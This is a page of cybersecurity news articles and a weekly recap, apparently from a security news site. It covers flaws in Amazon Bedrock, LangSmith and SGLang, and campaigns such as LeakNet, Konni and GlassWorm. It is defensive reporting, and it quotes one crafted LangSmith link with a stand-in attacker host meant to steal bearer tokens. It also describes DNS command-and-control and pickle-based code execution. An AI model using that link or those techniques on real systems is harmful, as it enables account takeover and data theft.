2026-03-18 AI创业新闻
AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE
Cybersecurity researchers have disclosed details of a new method for exfiltrating sensitive data from artificial intelligence (AI) code execution environments using domain name system (DNS) queries. In a report published Monday, BeyondTrust revealed that Amazon Bedrock AgentCore Code Interpreter’s sandbox mode permits outbound DNS queries that an attacker can exploit to enable interactive shells and bypass network isolation. The issue, which does not have a CVE identifier, carries a CVSS score of 7.5 out of 10.0. Amazon Bedrock AgentCore Code Interpreter is a fully managed service that enables AI agents to securely execute code in isolated sandbox environments , such that agentic workloads cannot access external systems.
It was launched by Amazon in August 2025. The fact that the service allows DNS queries despite “no network access” configuration can allow “threat actors to establish command-and-control channels and data exfiltration over DNS in certain scenarios, bypassing the expected network isolation controls,” Kinnaird McQuade, chief security architect at BeyondTrust, said. In an experimental attack scenario, a threat actor can abuse this behavior to set up a bidirectional communication channel using DNS queries and responses, obtain an interactive reverse shell, exfiltrate sensitive information through DNS queries if their IAM role has permissions to access AWS resources like S3 buckets storing that data, and perform command execution. What’s more, the DNS communication mechanism can be abused to deliver additional payloads that are fed to the Code Interpreter, causing it to poll the DNS command-and-control (C2) server for commands stored in DNS A records, execute them, and return the results via DNS subdomain queries.
It’s worth noting that Code Interpreter requires an IAM role to access AWS resources. However, a simple oversight can cause an overprivileged role to be assigned to the service, granting it broad permissions to access sensitive data. “This research demonstrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters,” BeyondTrust said. “By using this method, attackers could have exfiltrated sensitive data from AWS resources accessible via the Code Interpreter’s IAM role, potentially causing downtime, data breaches of sensitive customer information, or deleted infrastructure.” Following responsible disclosure in September 2025, Amazon has determined it to be intended functionality rather than a defect, urging customers to use VPC mode instead of sandbox mode for complete network isolation.
The tech giant is also recommending the use of a DNS firewall to filter outbound DNS traffic. “To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode,” Jason Soroko, senior fellow at Sectigo, said. “Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution. Finally, security teams must rigorously audit the IAM roles attached to these interpreters, strictly enforcing the principle of least privilege to restrict the blast radius of any potential compromise.” LangSmith Susceptible to Account Takeover Flaw The disclosure comes as Miggo Security disclosed a high-severity security flaw in LangSmith ( CVE-2026-25750 , CVSS score: 8.5) that exposed users to potential token theft and account takeover.
The issue, which affects both self-hosted and cloud deployments, has been addressed in LangSmith version 0.12.71 released in December 2025. The shortcoming has been characterized as a case of URL parameter injection stemming from a lack of validation on the baseUrl parameter, enabling an attacker to steal a signed-in user’s bearer token, user ID, and workspace ID transmitted to a server under their control through social engineering techniques like tricking the victim into clicking on a specially crafted link like below -
Cloud - smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
Self-hosted -
As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails. This risk is compounded because, like ‘traditional’ software, AI Agents have deep access to internal data sources and third-party services.” Unsafe Pickle Deserialization Flaws in SGLang Security vulnerabilities have also been flagged in SGLang, a popular open-source framework for serving large language models and multimodal AI models, which, if successfully exploited, could trigger unsafe pickle deserialization , potentially resulting in remote code execution. The vulnerabilities, discovered by Orca security researcher Igor Stepansky, remain unpatched as of writing. A brief description of the flaws is as follows - CVE-2026-3059 (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability through the ZeroMQ (aka ZMQ) broker, which deserializes untrusted data using pickle.loads() without authentication.
It affects SGLang’s multimodal generation module. CVE-2026-3060 (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’ encoder parallel disaggregation system. CVE-2026-3989 (CVSS score: 7.8) - The use of an insecure pickle.load() function without validation and proper deserialization in SGLang’s “replay_request_dump.py,” which can be exploited by providing a malicious pickle file.
“The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network,” Stepansky said . “The third involves insecure deserialization in a crash dump replay utility.” In a coordinated advisory, the CERT Coordination Center (CERT/CC) said SGLang is vulnerable to CVE-2026-3059 when the multimodal generation system is enabled, and to CVE-2026-3060 when the encoder parallel disaggregation system is enabled. “If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, they can exploit the vulnerability by sending a malicious pickle file to the broker, which will then deserialize it,” CERT/CC said . Users of SGLang are recommended to restrict access to the service interfaces and ensure they are not exposed to untrusted networks.
It’s also advised to implement adequate network segmentation and access controls to prevent unauthorized interaction with the ZeroMQ endpoints. While there is no evidence that these vulnerabilities have been exploited in the wild, it’s crucial to monitor for unexpected inbound TCP connections to the ZeroMQ broker port, unexpected child processes spawned by the SGLang Python process, file creation in unusual locations by the SGLang process, and outbound connections from the SGLang process to unexpected destinations. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader
The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic delivered through compromised websites as an initial access method. The use of ClickFix, where users are tricked into manually running malicious commands to address non-existent errors, is a departure from relying on traditional methods for obtaining initial access, such as through stolen credentials acquired from initial access brokers (IABs), ReliaQuest said in a technical report published today. The second important aspect of these attacks is the use of a staged command-and-control (C2) loader built on the Deno JavaScript runtime to execute malicious payloads directly in memory. “The key takeaway here is that both entry paths lead to the same repeatable post-exploitation sequence every time,” the cybersecurity company said.
“That gives defenders something concrete to work with: known behaviors you can detect and disrupt at each stage, well before ransomware deployment, regardless of how LeakNet got in.” LeakNet first emerged in November 2024 , describing itself as a “digital watchdog” and framing its activities as focused on internet freedom and transparency. According to data captured by Dragos , the group has also targeted industrial entities. The use of ClickFix to breach victims offers several advantages, the most significant being that it reduces dependence on third-party suppliers, lowers per-victim acquisition cost, and removes the operational bottleneck of waiting for valuable accounts to hit the market. In these attacks, the legitimate-but-compromised sites are used to serve fake CAPTCHA verification checks that instruct users to copy and paste a “msiexec.exe” command to the Windows Run dialog.
The attacks are not confined to a specific industry vertical, instead casting a wide net to infect as many victims as possible. The development comes as more threat actors are adopting the ClickFix playbook, as it abuses trusted, everyday workflows to entice users into running rogue commands via legitimate Windows tooling in a manner that feels routine and safe. “LeakNet’s adoption of ClickFix marks both the first documented expansion of the group’s initial access capability and a meaningful strategic shift,” ReliaQuest said. “By moving away from IABs, LeakNet removes a dependency that naturally constrained how quickly and broadly it could operate.
And because ClickFix is delivered through legitimate—but compromised—websites, it doesn’t present the same obvious signals at the network layer as attacker-owned infrastructure.” Besides the use of ClickFix to initiate the attack chain, LeakNet is assessed to be using a Deno-based loader to execute Base64-encoded JavaScript directly in memory so as to minimize on-disk evidence and evade detection. The payload is designed to fingerprint the compromised system, contact an external server to fetch next-stage malware, and enter into a polling loop that repeatedly fetches and executes additional code through Deno. Separately, ReliaQuest said it also observed an intrusion attempt in which threat actors used Microsoft Teams-based phishing to socially engineer a user into launching a payload chain that ended in a similar Deno-based loader. While the activity remains unattributed, the use of the bring your own runtime (BYOR) approach either signals a broadening of LeakNet’s initial access vectors, or that other threat actors have adopted the technique.
LeakNet’s post-compromise activity follows a consistent methodology: it starts with the use of DLL side-loading to launch a malicious DLL delivered via the loader, followed by lateral movement using PsExec, data exfiltration, and encryption. “LeakNet runs cmd.exe /c klist, a built-in Windows command that displays active authentication credentials on the compromised system. This tells the attacker which accounts and services are already reachable without the need for requesting new credentials, so they can move faster and more deliberately,” ReliaQuest said. “For staging and exfiltration, LeakNet uses S3 buckets, exploiting the appearance of normal cloud traffic to reduce its detection footprint.” The development comes as Google revealed that Qilin (aka Agenda), Akira (aka RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (aka FireFlame and FuryStorm), and Sinobi emerged as the top 10 ransomware brands with the most victims claimed on their data leak sites.
“In a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls,” Google Threat Intelligence Group (GTIG) said , adding 77% of analyzed ransomware intrusions included suspected data theft, an increase from 57% in 2024. “Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. Several indicators suggest the overall profitability of these operations is, however, declining, and at least some threat actors are shifting their targeting calculus away from large companies to instead focus on higher volume attacks against smaller organizations.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
AI is Everywhere, But CISOs are Still Securing It with Yesterday’s Skills and Tools, Study Finds
A majority of security leaders are struggling to defend AI systems with tools and skills that are not fit for the challenge, according to the AI and Adversarial Testing Benchmark Report 2026 from Pentera. The report, based on a survey of 300 US CISOs and senior security leaders, examines how organizations are securing AI infrastructure and highlights critical gaps tied to skills shortages and reliance on security controls not designed for the AI era. AI adoption is outpacing security visibility AI systems are rarely deployed in isolation. They are layered across and integrated into existing corporate technology, from cloud platforms and identity systems to applications and data pipelines.
With ownership spread across disparate teams, effective centralized oversight has collapsed. As a result, 67 percent of CISOs reported limited visibility into how AI is being used across their organization. None of the respondents indicated they have full visibility; rather, they acknowledge being aware of or accepting some form of unmanaged or unsanctioned AI usage. Without a clear view of where AI systems operate or what resources they can access, security teams struggle to assess risk effectively.
Basic questions, such as which identities AI systems rely on, what data they can reach, or how they behave when controls fail, often remain unanswered. Skills, not budget, are the primary barrier Although AI security is now a regular topic in boardrooms and executive discussions, the study shows that the biggest challenges are not financial. CISOs identified the following as their top obstacles to securing AI infrastructure: Lack of internal expertise (50 percent) Limited visibility into AI usage (48 percent) Insufficient security tools designed specifically for AI systems (36 percent) Only 17 percent cited budget constraints as a primary concern. This suggests that many organizations are willing to invest in AI security, but do not yet have the specialized skills needed to evaluate AI-related risks in real environments.
AI systems introduce behaviors that security teams are still learning to assess, including autonomous decision-making, indirect access paths, and privileged interaction between systems. Without the right expertise and active testing, it becomes difficult to evaluate whether existing controls are effective as intended. Legacy controls are carrying most of the load In the absence of AI-specific best practices, skills, and tooling, most enterprises are extending existing security controls to cover AI infrastructure. The study found that 75 percent of CISOs rely on legacy security controls, such as endpoint, application, cloud, or API security tools, to protect AI systems.
Only 11 percent reported having security tools designed specifically to secure AI infrastructure. This approach reflects a familiar pattern seen during previous technology shifts, where organizations initially adapt existing defenses before more tailored security practices emerge. While this can provide basic coverage, controls built for traditional systems may not account for how AI changes access patterns and expands potential attack paths. A familiar challenge, now applied to AI Taken together, the findings show that AI security challenges stem from foundational gaps rather than a lack of awareness or intent.
As AI becomes a core part of enterprise infrastructure, the report suggests that organizations will need to focus on building expertise and improving how they validate security controls across environments where AI is already operating. To explore the full findings, download the AI and Adversarial Testing Benchmark Report 2026 for a deeper discussion of the data and key takeaways. Note: This article was written by Ryan Dory, Director, Technical Advisors at Pentera. Found this article interesting?
This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Konni Deploys EndRAT Through Phishing, Uses KakaoTalk to Propagate Malware
North Korean threat actors have been observed sending phishing to compromise targets and obtain access to a victim’s KakaoTalk desktop application to distribute malicious payloads to certain contacts. The activity has been attributed by South Korean threat intelligence firm Genians to a hacking group referred to as Konni . “Initial access was achieved through a spear-phishing email disguised as a notice appointing the recipient as a North Korean human rights lecturer,” the Genians Security Center (GSC) noted in an analysis. “After the spear-phishing attack succeeded, the victim executed a malicious LNK file, resulting in infection with remote access malware.
The malware remained concealed and persistent on the victim’s endpoint for an extended period, stealing internal documents and sensitive information.” The threat actor is said to have remained on the compromised host for an extended period of time, leveraging the unauthorized access to siphon internal documents and make use of the KakaoTalk application to selectively propagate the malware to specific contacts. The attack is notable for abusing the trust associated with compromised victims to deceive and ensnare additional targets. This is not the first time Konni has employed the messaging app as a distribution vector. In November 2025, the hacking group was found abusing signed-in KakaoTalk chat app sessions to send malicious payloads to victims’ contacts in the form of a ZIP archive, while simultaneously initiating a remote wipe of their Android devices using stolen Google credentials.
The starting point of the latest attack campaign is a spear-phishing email that’s used as a ploy to trick recipients into opening a ZIP file attachment containing a Windows shortcut (LNK). Upon execution, the LNK file downloads a next-stage payload from an external server, establishes persistence using scheduled tasks, and ultimately executes the malware, while displaying a PDF decoy document to the user as a distraction mechanism. Written in AutoIt, the downloaded malware is a remote access trojan (RAT) named EndRAT (aka EndClient RAT), which allows the operator to remotely commandeer the compromised host through capabilities like file management, remote shell access, data transfer, and persistence. Further analysis of the infected host has uncovered the presence of various malicious artifacts, including AutoIt scripts corresponding to RftRAT and Remcos RAT , indicating that the adversary deemed the victim as valuable enough to drop multiple RAT families for improved resilience.
An important aspect of the attack is the threat actor’s abuse of the victim’s KakaoTalk application installed on the infected system to distribute malicious files in the form of ZIP files to other individuals in their contact list and deploy the same malware. This essentially turns existing victims into intermediaries for further attacks. “This campaign is assessed as a multi-stage attack operation that extends beyond simple spear-phishing, combining long-term persistence, information theft, and account-based redistribution,” Genians said. “The actor selected certain contacts from the victim’s friend list and sent them additional malicious files.
In doing so, the attacker used filenames disguised as materials introducing North Korea-related content to induce recipients to open the files.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
CISA Flags Actively Exploited Wing FTP Vulnerability Leaking Server Paths
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a medium-severity security flaw impacting Wing FTP to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. The vulnerability, CVE-2025-47813 (CVSS score: 4.3), is an information disclosure vulnerability that leaks the installation path of the application under certain conditions. “Wing FTP Server contains a generation of error messages containing sensitive information vulnerability when using a long value in the UID cookie,” CISA said.
The shortcoming affects all versions of the software prior to and including version 7.4.3. The issue was addressed in version 7.4.4, shipped in May following a responsible disclosure by RCE Security researcher Julien Ahrens. It’s worth noting that version 7.4.4 also patches CVE-2025-47812 (CVSS score: 10.0), another critical bug in the same product that allows for remote code execution. As of July 2025, the vulnerability has come under active exploitation in the wild.
According to details shared by Huntress at the time, attackers have leveraged it to download and execute malicious Lua files, conduct reconnaissance, and install remote monitoring and management software. Ahrens, in a proof-of-concept (PoC) exploit, shared on GitHub, noted that the endpoint at “/loginok.html” does not properly validate the value of the “UID” session cookie. As a result, if the supplied value is longer than the maximum path size of the underlying operating system, it triggers an error message that discloses the full local server path. “Successful exploits can allow an authenticated attacker to get the local server path of the application, which can help in exploiting vulnerabilities like CVE-2025-47812,” the researcher added .
There are currently no details on how the vulnerability is being exploited in the wild, and if it’s being abused in conjunction with CVE-2025-47812. In light of the latest development, Federal Civilian Executive Branch (FCEB) agencies are recommended to apply the necessary fixes by March 30, 2026. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
GlassWorm Attack Uses Stolen GitHub Tokens to Force-Push Malware Into Python Repos
The GlassWorm malware campaign is being used to fuel an ongoing attack that leverages the stolen GitHub tokens to inject malware into hundreds of Python repositories. “The attack targets Python projects — including Django apps, ML research code, Streamlit dashboards, and PyPI packages — by appending obfuscated code to files like setup.py, main.py, and app.py,” StepSecurity said . “Anyone who runs pip install from a compromised repo or clones and executes the code will trigger the malware.” According to the software supply chain security company, the earliest injections date back to March 8, 2026. The attackers, upon gaining access to the developer accounts, rebasing the latest legitimate commits on the default branch of the targeted repositories with malicious code, and then force-pushing the changes, while keeping the original commit’s message, author, and author date intact.
This new offshoot of the GlassWorm campaign has been codenamed ForceMemo. The attack plays out via the following four steps - Compromise developer systems with GlassWorm malware through malicious VS Code and Cursor extensions. The malware contains a dedicated component to steal secrets, such as GitHub tokens. Use the stolen credentials to force-push malicious changes to every repository managed by the breached GitHub account by rebasing obfuscated malware to Python files named “setup.py,” “main.py,” or “app.py.” The Base64-encoded payload, appended to the end of the Python file, features GlassWorm-like checks to determine if the system has its locale set to Russian.
If so, it skips execution. In all other cases, the malware queries the transaction memo field associated with a Solana wallet (“BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC”) previously linked to GlassWorm to extract the payload URL. Download additional payloads from the server, including encrypted JavaScript that’s designed to steal cryptocurrency and data. “The earliest transaction on the C2 address dates to November 27, 2025 – over three months before the first GitHub repo injections on March 8, 2026,” StepSecurity said.
“The address has 50 transactions total, with the attacker regularly updating the payload URL, sometimes multiple times per day.” The disclosure comes as Socket flagged a new iteration of the GlassWorm that technically retains the same core tradecraft while improving survivability and evasion by leveraging extensionPack and extensionDependencies to deliver the malicious payload by means of a transitive distribution model. In tandem, Aikido Security also attributed the GlassWorm author to a mass campaign that compromised more than 151 GitHub repositories with malicious code concealed using invisible Unicode characters. Interestingly, the decoded payload is configured to fetch the C2 instructions from the same Solana wallet, indicating that the threat actor has been targeting GitHub repositories in multiple waves. The use of different delivery methods and code obfuscation methods, but the same Solana infrastructure, suggests ForceMemo is a new delivery vector maintained and operated by the GlassWorm threat actor, who has now expanded from compromising VS Code extensions to a broader GitHub account takeover.
“The attacker injects malware by force-pushing to the default branch of compromised repositories,” StepSecurity noted. “This technique rewrites git history, preserves the original commit message and author, and leaves no pull request or commit trail in GitHub’s UI. No other documented supply chain campaign uses this injection method.” Update Two React Native npm packages – react-native-international-phone-number and react-native-country-select – maintained by npm user “astroonauta” were briefly compromised to directly push malicious versions to the registry without a corresponding GitHub release. The activity is assessed to be part of the ForceMemo campaign.
react-native-international-phone-number - 0.11.8 react-native-country-select — 0.3.91 The rogue versions, detected on March 16, 2026, have been found to contain a preinstall hook that invokes obfuscated JavaScript to initiate a series of actions: skip Russian victims by inspecting environment variables and operating system time zone, reaches out to a hard-coded Solana wallet (“6YGcuyFRJKZtcaYCCFba9fScNUvPkGXodXE1mJiSzqDJ”) – also linked to GlassWorm – to extract the payload URL and deliver platform-specific malware. “The decrypted payload is executed entirely in memory, never written to disk, via eval() on macOS/Linux or a Node.js vm.Script sandbox on other platforms,” StepSecurity said. “A persistence lock is written to ~/init.json with the current timestamp; the malware will not re-execute within a 48-hour window on the same machine.” (The story was updated after publication to include additional details of the campaign.) Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
⚡ Weekly Recap: Chrome 0-Days, Router Botnets, AWS Breach, Rogue AI Agents & More
Some weeks in security feel normal. Then you read a few tabs and get that immediate “ah, great, we’re doing this now” feeling. This week has that energy. Fresh messes, old problems getting sharper, and research that stops feeling theoretical real fast.
A few bits hit a little too close to real life, too. There’s a good mix here: weird abuse of trusted stuff, quiet infrastructure ugliness, sketchy chatter, and the usual reminder that attackers will use anything that works. Scroll on. You’ll see what I mean.
⚡ Threat of the Week Google Patches 2 Actively Exploited Chrome 0-Days — Google released security updates for its Chrome web browser to address two high-severity vulnerabilities that it said have been exploited in the wild. The vulnerabilities related to an out-of-bounds write vulnerability in the Skia 2D graphics library (CVE-2026-3909) and an inappropriate implementation vulnerability in the V8 JavaScript and WebAssembly engine (CVE-2026-3910) that could result in out-of-bounds memory access or code execution, respectively. Google did not share additional details about the flaws, but acknowledged that there exist exploits for both of them. The issues were addressed in Chrome versions 146.0.7680.75/76 for Windows and Apple macOS, and 146.0.7680.75 for Linux.
Detection Starts the Clock. Response Decisions Shape the Outcome When incidents escalate, early decisions determine containment and impact. Join this SANS IR Command Roundtable to learn how experienced teams avoid investigation drift, improve coordination, and execute faster response across cloud, enterprise, and operational environments. Watch the Webcast ➝ 🔔 Top News Meta to Discontinue Instagram E2EE in May 2026 — Meta announced plans to discontinue support for end-to-end encryption (E2EE) for chats on Instagram after May 8, 2026.
In a statement shared with The Hacker News, a Meta spokesperson said, “Very few people were opting in to end-to-end encrypted messaging in DMs, so we’re removing this option from Instagram in the coming months. Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp.” Authorities Disrupt SocksEscort Service — A court-authorized international law enforcement operation dismantled a criminal proxy service named SocksEscort that enslaved thousands of residential routers worldwide into a botnet for committing large-scale fraud. “The malware allowed SocksEscort to direct internet traffic through the infected routers. SocksEscort sold this access to its customers,” the U.S.
Justice Department said. The main thing to note here is that SocksEscort was powered by AVrecon, a malware written in C to explicitly target MIPS and ARM architectures via known security flaws in edge network devices. The malware also featured a novel persistence mechanism that involved flashing custom firmware, which intentionally disables future updates, permanently transforming SOHO routers into SocksEscort proxy nodes to blindside corporate monitoring. UNC6426 Exploits nx npm Supply Chain Attack to Gain AWS Admin Access in 72 Hours — A threat actor known as UNC6426 leveraged keys stolen following the supply chain compromise of the nx npm package in August 2025 to completely breach a victim’s AWS environment within 72 hours.
UNC6426 used the access to abuse the GitHub-to-AWS OpenID Connect (OIDC) trust and create a new administrator role in the cloud environment, Google said. Subsequently, this role was abused to exfiltrate files from the client’s Amazon Web Services (AWS) Simple Storage Service (S3) buckets and perform data destruction in their production cloud environments. KadNap Enslaves Network Devices to Fuel Illegal Proxy — A takedown-resistant botnet comprising more than 14,000 routers and other network devices has been conscripted into a proxy network that anonymously ferries traffic used for cybercrime. The botnet, named KadNap, exploits known vulnerabilities in Asus routers (among others), leveraging the initial access to drop shell scripts that reach out to a peer-to-peer network based on Kademlia for decentralized control.
Infected devices are being used to fuel a proxy service named Doppelganger that, for a fee, tunnels customers’ internet traffic through residential IP addresses, offering a way for attackers to blend in and make it harder to differentiate malicious traffic from legitimate activity. APT28 Strikes with Sophisticated Toolkit — The Russian threat actor known as APT28 has been observed using a bespoke toolkit in recent cyber espionage campaigns targeting Ukrainian cyber assets. The primary components of the toolkit are two implants, one of which employs techniques from a malware framework the threat actor used in 2010s, while the other is a heavily modified version of the COVENANT framework for long-term spying. COVENANT is used in concert with BEARDSHELL to facilitate data exfiltration, lateral movement, and execution of PowerShell commands.
Also alongside these tools is a malware named SLIMAGENT that shares overlaps with XAgent. ️🔥 Trending CVEs New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. The flaws below are this week’s most critical — high-severity, widely used software, or already drawing attention from the security community. Check these first, patch what applies, and don’t wait on the ones marked urgent — CVE-2026-3909, CVE-2026-3910 , CVE-2026-3913 (Google Chrome), CVE-2026-21666, CVE-2026-21667, CVE-2026-21668, CVE-2026-21672, CVE-2026-21708, CVE-2026-21669, CVE-2026-21671 (Veeam Backup & Replication), CVE-2026-27577, CVE-2026-27493, CVE-2026-27495, CVE-2026-27497 (n8n), CVE-2026-26127, CVE-2026-21262 (Microsoft Windows), CVE-2019-17571, CVE-2026-27685 (SAP), CVE-2026-3102 (ExifTool for macOS), CVE-2026-27944 (Nginx UI), CVE-2025-67826 (K7 Ultimate Security), CVE-2026-26224 , CVE-2026-26225 (Intego X9), CVE-2026-29000 ( pac4j-jwt ), CVE-2026-23813 (HPE Aruba Networking AOS-CX), CVE-2025-12818 ( PostgreSQL ), CVE-2026-2413 (Ally WordPress plugin), CVE-2026-0953 (Tutor LMS Pro WordPress plugin), CVE-2026-25921 (Gogs), CVE-2026-2833, CVE-2026-2835, CVE-2026-2836 (Cloudflare Pingora), CVE-2026-24308 (Apache ZooKeeper), CVE-2026-3059, CVE-2026-3060, CVE-2026-3989 (SGLang), CVE-2026-0231 (Palo Alto Networks Cortex XDR Broker VM), CVE-2026-20040, CVE-2026-20046 (Cisco IOS XR Software), CVE-2025-65587 (graphql-upload-minimal), CVE-2026-3497 (OpenSSH), CVE-2026-26123 (Microsoft Authenticator for Android and iOS), and CVE-2025-61915 (CUPS).
🎥 Cybersecurity Webinars Stop Guessing: Automate Your Defense Against Real-World Attacks → Learn how to move beyond basic security checklists by using automation to test your defenses against real-world attacks. Experts will show you why traditional testing often fails and how to use continuous, data-driven tools to find and fix gaps in your protection. You will learn how to prove your security actually works without increasing your manual workload. Fix Your Identity Security: Closing the Gaps Before Hackers Find Them → This webinar covers a new study about why many companies are struggling to keep their user accounts and digital identities safe.
Experts share findings from the Ponemon Institute on the biggest security gaps, such as disconnected apps and the new risks created by AI. You will learn simple, practical steps to fix these problems and get better control over who has access to your company’s data. The Ghost in the Machine: Securing the Secret Identities of Your AI Agents → As artificial intelligence (AI) begins to act on its own, businesses face a new challenge: how to give these “AI agents” the right digital IDs. This webinar explains why current security for humans doesn’t work for autonomous bots and how to build a better system to track what they do.
You will learn simple, real-world steps to give AI agents secure identities and clear rules, ensuring they don’t accidentally expose your private company data. 📰 Around the Cyber World Fake Google Security Check Drops Browser RAT — A web page mimicking a Google Account security page has been spotted delivering a fully featured browser-based surveillance toolkit that takes the form of a Progressive Web App (PWA). “Disguised as a routine security checkup, it walks victims through a four-step flow that grants the attacker push notification access, the device’s contact list, real-time GPS location, and clipboard contents—all without installing a traditional app,” Malwarebytes said . “For victims who follow every prompt, the site also delivers an Android companion package introducing a native implant that includes a custom keyboard (enabling keystroke capture), accessibility-based screen reading capabilities, and permissions consistent with call log access and microphone recording.” Forbidden Hyena Delivers BlackReaperRAT — A hacktivist group known as Forbidden Hyena (aka 4B1D) has distributed RAR archives in December 2025 and January 2026 in attacks targeting Russia that led to the deployment of a previously undocumented remote access trojan called BlackReaperRAT and an updated version of the Blackout Locker ransomware, referred to as Milkyway by the threat actors.
BlackReaperRAT is capable of running commands via “cmd.exe,” uploading/downloading files, spawning an HTTP shell to receive commands, and spreading the malware to connected removable media. “It carries out destructive attacks against organizations across various sectors located within the Russian Federation,” BI.ZONE said. “The group publishes information regarding successful attacks on its Telegram channel. It collaborates with the groups Cobalt Werewolf and Hoody Hyena.” Chinese Hackers Target the Persian Gulf region with PlugX — A China-nexus threat actor, likely suspected to be Mustang Panda , has targeted countries in the Persian Gulf region.
The activity took place within the first 24 hours of the ongoing conflict in the Middle East late last month. The campaign used a multi-stage attack chain that ultimately deployed a PlugX backdoor variant. “The shellcode and PlugX backdoor used obfuscation techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA) to hinder reverse engineering,” Zscaler said . “The PlugX variant in this campaign supports HTTPS for command-and-control (C2) communication and DNS-over-HTTPS (DOH) for domain resolution.” Phishing Campaign Uses SEO Poisoning to Steal Data — A phishing campaign has employed SEO poisoning to direct search engine results to fake traffic ticket portals that impersonate the Government of Canada and specific provincial agencies.
“The campaign lures victims to a fake ‘Traffic Ticket Search Portal’ under the pretense of paying outstanding traffic violations,” Palo Alto Networks Unit 42 said . “Submitted data includes license plates, address, date of birth, phone/email, and credit card numbers.” The phishing pages utilize a “waiting room” tactic where the victim’s browser polls the server every two seconds and triggers redirects based on specific status codes. Roundcube Exploitation Toolkit Discovered — Hunt.io said it discovered a Roundcube exploitation toolkit on an internet-exposed directory on 203.161.50[.]145. It’s worth noting that Russian threat actors like APT28, Winter Vivern, and TAG-70 have repeatedly targeted Roundcube vulnerabilities to breach Ukrainian organizations.
“The directory included development and production XSS payloads, a Flask-based command-and-control server, CSS-injection tooling, operator bash history, and a Go-based implant deployed on a compromised Ukrainian web application,” the company said, attributing it with medium to high confidence to APT28, citing overlaps with Operation RoundPress . The toolkit, dubbed Roundish, supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and two-factor authentication (2FA) secret extraction, mirroring a feature present in MDAEMON. One of the primary targets of the attack is mail.dmsu.gov[.]ua, a Roundcube webmail instance associated with Ukraine’s State Migration Service (DMSU). Besides the possibility of a shared development lineage, Roundish introduces four new components not previously documented in APT28 webmail activity, including a CSS-based side-channel module, browser credential stealer, and a Go-based backdoor that provides persistence via cron, systemd, and SELinux.
The CSS injection component is designed to progressively extract characters from Roundcube’s document object model (DOM) without injecting any JavaScript into the victim’s page. The technique is likely used for targeting Cross-Site Request Forgery (CSRF) tokens or email UIDs. Central to the Roundish toolkit is an XSS payload that’s engineered to steal the victim’s email address, harvest account credentials, redirect all incoming emails to a Proton Mail address, export mailbox data from the victim’s Inbox and Sent folders, and gather the victim’s complete address book. “The combination of hidden autofill credential harvesting, server-side mail forwarding persistence, bulk mailbox exfiltration, and browser credential theft reflects a modular approach designed for sustained access,” Hunt.io said .
“From a defensive perspective, password resets alone are not sufficient in cases like this. Mail forwarding rules, Sieve filters, and multi-factor authentication secrets must be audited and reset.” Phishing Campaign Targeting AWS Console Credentials — An active adversary-in-the-middle (AiTM) phishing campaign is using fake security alert emails to steal AWS Console credentials, per Datadog. “The phishing kit proxies authentication to the legitimate AWS sign-in endpoint in real time, validating credentials before redirecting victims and likely capturing one-time password (OTP) codes,” the company said . “This campaign does not exploit AWS vulnerabilities or abuse AWS infrastructure.” Post-compromise console access has been observed within 20 minutes of credential submission.
These efforts originated from Mullvad VPN infrastructure. Malicious npm Packages Deliver Cipher stealer — Two new malicious npm packages, bluelite-bot-manager and test-logsmodule-v-zisko, were found to deliver via Dropbox a Windows executable designed to siphon sensitive data, including Discord totems, credentials from Chrome, Edge, Opera, Brave, and Yandex browsers, and seed files from cryptocurrency wallet apps like Exodus. from compromised hosts using a stealer named Cipher stealer. “The stealer also uses an embedded Python script and a secondary payload downloaded from GitHub,” JFrog said .
GIBCRYPTO Ransomware Detailed — A new ransomware called GIBCRYPTO comes with the ability to capture keystrokes and corrupt the Master Boot Record (MBR) so that any attempt to restart the system will cause the system to run into an error. The ransomware uses the Salsa20 algorithm for encryption. It’s suspected to be part of Snake Keylogger , indicating the malware authors’ attempts to diversify beyond information theft. The development comes as Sygnia highlighted SafePay’s OneDrive-based data exfiltration technique during a ransomware attack after breaching a victim by leveraging a FortiGate firewall flaw and a misconfigured administrative account.
“SafePay gained initial access by exploiting a firewall misconfiguration, which enabled them to obtain local administrative credentials,” the company said . “They rapidly escalated discovery and enumeration activities to identify high-value targets for lateral movement, demonstrating a structured and methodical approach to mapping the environment. Within a matter of hours, SafePay escalated to domain administrator access.” The attack culminated in the deployment of ransomware, encrypting more than 60 servers. Fraudulent Account Registration Activity Originating from Vietnam — A sprawling cybercrime ecosystem based in Vietnam has been linked to a cluster of fraudulent account registration activity on platforms like LinkedIn, Instagram, Facebook, and TikTok.
